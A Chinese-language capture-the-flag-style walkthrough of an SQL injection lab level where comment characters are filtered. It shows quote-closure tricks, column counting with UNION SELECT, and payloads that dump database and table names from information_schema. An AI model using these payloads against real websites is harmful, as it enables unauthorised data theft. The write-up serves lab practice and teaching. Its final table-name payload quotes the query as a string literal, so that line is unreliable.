第二十三关
这关是GET注入方式,单引号闭合,但是找注入点的时候发现注释符被过滤了。
1.png
不能注释只能使用闭合,order by也不能用了,因为order by一般在sql语句的尾部,在order by后面再使用'闭合后面的单引号,mysql会将order by 忽略掉。
输入:?id=1' order by 100 and 1='1
2.png
实际有3个字段,但是我输入100它却没有报错,所以不能用order by,只能用union select一点一点猜了。
?id=1' union select '1
id=1' union select 1,'2
?id=1' union select 1,2,'3
当写到三个字段的时候页面显示正常了:
3.png
说明有3个字段,剩下的和显错注入一样了。
所有数据库名:?id=1.1' union select 1, (select group_concat(schema_name) from information_schema.schemata),'3
数据表名:?id=1.1' union select 1,2,'group_concat(table_name) from information_schema.tables where table_schema=database()
网友评论